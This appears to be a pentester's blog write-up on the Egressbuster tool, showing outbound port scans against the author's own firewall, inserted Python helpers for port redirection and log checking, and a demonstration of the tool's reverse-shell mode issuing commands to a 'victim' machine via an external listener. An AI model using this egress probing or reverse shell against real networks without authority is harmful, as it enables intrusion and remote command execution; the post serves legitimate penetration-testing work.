While I’ve used it for a while now, I wanted to share a quick write-up about Egressbuster.
Egressbuster (GitHub repository) is a tool by TrustedSec designed to test outgoing ports during a penetration test.
First, I configured my firewall to block all outgoing ports except for 22, 80, 443, and 31337-31339. This would allow me to verify that the application was working.
Additionally, it mirrors a real environment that might only allow HTTP(s) traffic and then something obscure outbound.
With my firewall rules in place, I started the server up on a DO droplet.
root@ubuntu-512mb-sfo2-01:~# ifconfig eth0 | grep Mask
inet addr:138.xx.xx.xx Bcast:138.xx.xx.255 Mask:255.255.xx.xx
root@ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
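The listener output above shows the trick that lets one process "listen on all TCP ports": an iptables NAT rule redirects every TCP connection from the client address to a single local port (1090), and the listener then asks the kernel which port the connection was originally aimed at. The code below is an added illustration of that mechanism and is not egress_listener.py or any other TrustedSec code; it assumes a Linux host, a redirect rule of the shape `iptables -t nat -A PREROUTING -s <client> -p tcp -j REDIRECT --to-ports 1090` (an assumption about the rule the tool's message describes, not a line taken from the post), and the Linux `SO_ORIGINAL_DST` socket option, which the Python socket module does not export, so its numeric value is hard-coded here.

```python
import socket
import struct
from typing import Tuple

# Linux-only constants. SO_ORIGINAL_DST (80) comes from <linux/netfilter_ipv4.h>;
# Python's socket module does not define it, so it is spelled out here (assumption:
# Linux kernel, IPv4 REDIRECT rule in the nat table as described in the lead-in).
SOL_IP = 0
SO_ORIGINAL_DST = 80
SOCKADDR_IN_LEN = 16


def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Build the 16-byte sockaddr_in the kernel hands back (used for offline testing)."""
    # sin_family is host byte order, sin_port and sin_addr are network byte order.
    return (struct.pack("=H", socket.AF_INET)
            + struct.pack("!H", port)
            + socket.inet_aton(ip)
            + bytes(8))  # sin_zero padding


def parse_original_dst(raw: bytes) -> Tuple[str, int]:
    """Decode the sockaddr_in returned by getsockopt(SOL_IP, SO_ORIGINAL_DST)."""
    if len(raw) < SOCKADDR_IN_LEN:
        raise ValueError("sockaddr_in must be at least 16 bytes")
    family = struct.unpack("=H", raw[:2])[0]
    if family != socket.AF_INET:
        raise ValueError(f"unexpected address family {family}; only AF_INET is handled")
    port, addr = struct.unpack("!H4s", raw[2:8])
    return socket.inet_ntoa(addr), port


def original_destination(conn: socket.socket) -> Tuple[str, int]:
    """Ask the kernel where a REDIRECTed connection was originally headed."""
    raw = conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, SOCKADDR_IN_LEN)
    return parse_original_dst(raw)


def serve(listen_port: int = 1090) -> None:
    """Minimal listener: one bound port, reports the pre-REDIRECT destination port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", listen_port))
        srv.listen(64)
        while True:
            conn, (peer_ip, _) = srv.accept()
            with conn:
                try:
                    _, dport = original_destination(conn)
                except OSError:
                    # Not a redirected connection (or not Linux): fall back to the bound port.
                    dport = listen_port
                print(f"[*] Connected from {peer_ip} on port: {dport}/tcp")


if __name__ == "__main__":
    serve()
```

Without the iptables rule the kernel has no original destination to report, so `getsockopt` fails and the fallback path is taken; that is also why the tool removes the rule on exit, otherwise every later TCP connection from the client address would keep landing on port 1090.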
With the server running, it was time to test the rules.
While I used the egressbuster.py script, the results will be the same with the executable as well.
Also, based on my “very official” timing method, it takes about 12 minutes to test every port over my connection.
C:\Users\Ray\Documents>time
The current time is: 15:57:43.78
Enter the new time:

C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-65535
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] Connection made to 138.xx.xx.xx on port: 80/tcp
[*] Connection made to 138.xx.xx.xx on port: 443/tcp
[v] Trying: TCP 1000
[v] Trying: TCP 2000
... <snip> ...
[v] Trying: TCP 31000
[*] Connection made to 138.xx.xx.xx on port: 31337/tcp
[*] Connection made to 138.xx.xx.xx on port: 31338/tcp
[*] Connection made to 138.xx.xx.xx on port: 31339/tcp
[v] Trying: TCP 32000
[v] Trying: TCP 33000
... <snip> ...
[v] Trying: TCP 65000
[*] All packets have been sent
[i] Remaining threads: 301
[i] Remaining threads: 102
[i] Remaining threads: 3
... <snip> ...
[i] Remaining threads: 3
Traceback (most recent call last):
  File "egressbuster.py", line 168, in <module>
    time.sleep(2)
KeyboardInterrupt

C:\Users\Ray\Documents>time
The current time is: 16:09:49.56
Enter the new time:
I’m not sure why three threads didn’t want to complete, but the results were still completely accurate.
Going back to the server, I was able to see the successful connections as well.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
[*] Connected from 172.xx.xx.xx on port: 80/tcp
[*] Connected from 172.xx.xx.xx on port: 443/tcp
[*] Connected from 172.xx.xx.xx on port: 31338/tcp
[*] Connected from 172.xx.xx.xx on port: 31337/tcp
[*] Connected from 172.xx.xx.xx on port: 31339/tcp
^C
[*] Exiting and removing iptables redirect rule.
[*] Done
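The point of a run like this is to compare what actually got out against what the firewall policy is supposed to allow, and to cross-check the client's view against the listener's. The two sides can disagree: a client-side "Connection made" only proves that something completed the TCP handshake, and a transparent proxy or TCP-intercepting middlebox can do that without any traffic reaching the listener, whereas a "Connected from" line on the listener is end-to-end evidence. The script below is an added example, not part of the post or of Egressbuster; it parses both output formats shown above and reconciles them against an allow-list. The log text it contains is constructed to resemble the post's output (with an extra port 8080 added to illustrate the middlebox case), and the addresses in it are made up.

```python
import re
from typing import Dict, Iterable, List, Set

# Constructed sample output modelled on the post's client run; 8080 is added here
# to show a port the client could reach but the listener never saw.
CLIENT_LOG = """\
[i] Sending packets to egress listener (138.0.0.1)...
[i] Starting at: 1/tcp, ending at: 65535/tcp
[*] Connection made to 138.0.0.1 on port: 22/tcp
[*] Connection made to 138.0.0.1 on port: 80/tcp
[*] Connection made to 138.0.0.1 on port: 443/tcp
[v] Trying: TCP 1000
[*] Connection made to 138.0.0.1 on port: 8080/tcp
[*] Connection made to 138.0.0.1 on port: 31337/tcp
[*] Connection made to 138.0.0.1 on port: 31338/tcp
[*] All packets have been sent
"""

# Constructed sample output modelled on the post's listener run (no 8080 here).
LISTENER_LOG = """\
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.16.0.10 on port: 22/tcp
[*] Connected from 172.16.0.10 on port: 80/tcp
[*] Connected from 172.16.0.10 on port: 443/tcp
[*] Connected from 172.16.0.10 on port: 31338/tcp
[*] Connected from 172.16.0.10 on port: 31337/tcp
"""

# Client lines read "Connection made to <ip> on port: N/tcp",
# listener lines read "Connected from <ip> on port: N/tcp"; one pattern covers both.
PORT_RE = re.compile(r"\[\*\] Connect(?:ion made to|ed from) \S+ on port: (\d+)/tcp")


def reached_ports(log: str) -> Set[int]:
    """Every port a log reports as successfully connected."""
    return {int(m.group(1)) for m in PORT_RE.finditer(log)}


def parse_allow_list(spec: str) -> Set[int]:
    """Turn a policy like '22,80,443,31337-31339' into the set of ports it allows."""
    allowed: Set[int] = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            allowed.update(range(lo, hi + 1))
        else:
            allowed.add(int(part))
    return allowed


def compare_to_policy(observed: Set[int], allowed: Set[int],
                      tested: Iterable[int]) -> Dict[str, List[int]]:
    """Split observed ports into policy-consistent, policy-violating, and missing."""
    tested_set = set(tested)
    return {
        "allowed_and_open": sorted(observed & allowed),
        "unexpected_open": sorted(observed - allowed),          # firewall gap
        "expected_but_closed": sorted((allowed & tested_set) - observed),
    }


def reconcile(client_log: str, listener_log: str) -> Dict[str, List[int]]:
    """Ports only one side saw: client-only suggests an intercepting middlebox."""
    c, l = reached_ports(client_log), reached_ports(listener_log)
    return {"client_only": sorted(c - l), "listener_only": sorted(l - c)}


if __name__ == "__main__":
    policy = parse_allow_list("22,80,443,31337-31339")
    print(compare_to_policy(reached_ports(LISTENER_LOG), policy, range(1, 65536)))
    print(reconcile(CLIENT_LOG, LISTENER_LOG))
```

Using the listener's port set (not the client's) as the "observed" input for the policy comparison is the conservative choice: it only counts ports where traffic demonstrably left the network. The reconciliation output then explains any gap between the two views.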
Finally, I want to give a quick demonstration of the shell parameter. This parameter creates a reverse shell that allows you to send commands to the “target” system. Author’s note: This reverse shell goes from your listening server to the internal server, so you will need to either have an external IP address or NAT configured.
First, I set up NAT rules on my pfSense box so that I could receive the commands.
Next, I started the server back up with the shell parameter.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
Finally, I ran the script to test outgoing connections again. Note that I only used ports 1-50 for this test since I already knew what would work.
C:\Users\Ray\Documents>python egressbuster.py 138.xx.xx.xx 1-50 shell
[i] Sending packets to egress listener (138.xx.xx.xx)...
[i] Starting at: 1/tcp, ending at: 50/tcp
[*] Connection made to 138.xx.xx.xx on port: 22/tcp
[*] All packets have been sent
[i] Remaining threads: 50
[i] Remaining threads: 50
[i] Remaining threads: 1
[i] Remaining threads: 1
[*] Done
On the listener side, I was able to send commands to the client. This was occasionally flaky, and would drop or send the wrong command. I would probably use this for short bursts/1 or 2 commands before migrating to something more stable.
root@r4y-ubuntu-512mb-sfo2-01:~# python egress_listener.py 138.xx.xx.xx eth0 172.xx.xx.xx shell
[*] Inserting iptables rule to redirect connections from 172.xx.xx.xx to **all TCP ports** to Egress Buster port 1090/tcp
[*] Listening on all TCP ports now... Press control-c when finished.
[*] Connected from 172.xx.xx.xx on port: 22/tcp
Enter the command to send to the victim:
Enter the command to send to the victim: whoami
megatron\ray
Enter the command to send to the victim: ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : xxx
   IPv4 Address. . . . . . . . . . . : 192.168.5.xx
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.5.1

Tunnel adapter isatap.
Enter the command to send to the victim: dir
----------------------------------------
Exception happened during processing of request from ('172.xx.xx.xx', 59070)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "egress_listener.py", line 63, in handle
    self.request.sendall(request)
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
error: [Errno 32] Broken pipe
----------------------------------------
dir
^C
[*] Exiting and removing iptables redirect rule.
[*] Done
This is a great tool for testing outgoing ports on a network, and I find myself using it from time to time.
Additionally, having the executable makes life easier for Windows machines without Python.
Note that a few antivirus vendors flag the executable, so be aware of that during your testing.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.